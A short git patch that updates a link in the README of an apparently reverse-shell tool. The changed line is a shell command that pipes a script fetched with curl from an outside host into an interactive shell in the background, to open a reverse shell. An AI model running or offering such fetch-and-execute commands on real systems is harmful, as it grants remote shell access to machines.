From a37aa9d90d90ac2936152eeb96f692a852bf9a72 Mon Sep 17 00:00:00 2001 From: Luke Childs Date: Tue, 20 Oct 2020 18:08:35 +0700 Subject: [PATCH] Fix old link --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 08fb35c..f7e7db4 100644 --- a/README.md +++ b/README.md @@ -76,7 +76,7 @@ The following command will run the reverse shell in a background process and exi Make sure you run this in a fresh terminal window otherwise you'll lose any work in your existing session. ```shell -sh -c "curl https://shell.now.sh/localhost:1337 | sh -i &" && exit +sh -c "curl https://reverse-shell.sh/localhost:1337 | sh -i &" && exit ``` ## License